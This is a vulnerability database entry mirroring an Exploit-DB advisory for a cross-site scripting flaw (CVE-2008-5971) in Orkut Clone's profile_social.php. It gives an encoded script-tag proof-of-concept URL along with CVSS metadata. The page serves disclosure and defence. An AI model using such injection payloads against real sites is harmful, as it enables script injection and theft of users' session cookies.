Search...

Orkut Clone profile_social.php id Parameter XSS

2008-12-02T00:00:00

ID EDB-ID:32637
Type exploitdb
Reporter d3b4g
Modified 2008-12-02T00:00:00

Description

Orkut Clone profile_social.php id Parameter XSS. CVE-2008-5971 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/32600/info
 
Orkut Clone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
http://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E

JSON Vulners Source

Initial Source

{"id": "EDB-ID:32637", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Orkut Clone profile_social.php id Parameter XSS", "description": "Orkut Clone profile_social.php id Parameter XSS. CVE-2008-5971 . Webapps exploit for php platform", "published": "2008-12-02T00:00:00", "modified": "2008-12-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/32637/", "reporter": "d3b4g", "references": [], "cvelist": ["CVE-2008-5971"], "lastseen": "2016-02-03T17:28:26", "viewCount": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-02-03T17:28:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5971"]}], "modified": "2016-02-03T17:28:26", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://www.exploit-db.com/download/32637/", "sourceData": "source: http://www.securityfocus.com/bid/32600/info\r\n \r\nOrkut Clone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nhttp://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E ", "osvdbidlist": ["50393"]}

{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "Cross-site scripting (XSS) vulnerability in profile_social.php in i-Net Solution Orkut Clone allows remote authenticated users to inject arbitrary web script or HTML via the id parameter.", "edition": 3, "cvss3": {}, "published": "2009-01-27T01:30:00", "title": "CVE-2008-5971", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5971"], "modified": "2017-08-08T01:33:00", "cpe": ["cpe:/a:i-netsolution:orkut_clone:_nil_"], "id": "CVE-2008-5971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:i-netsolution:orkut_clone:_nil_:*:*:*:*:*:*:*"]}]}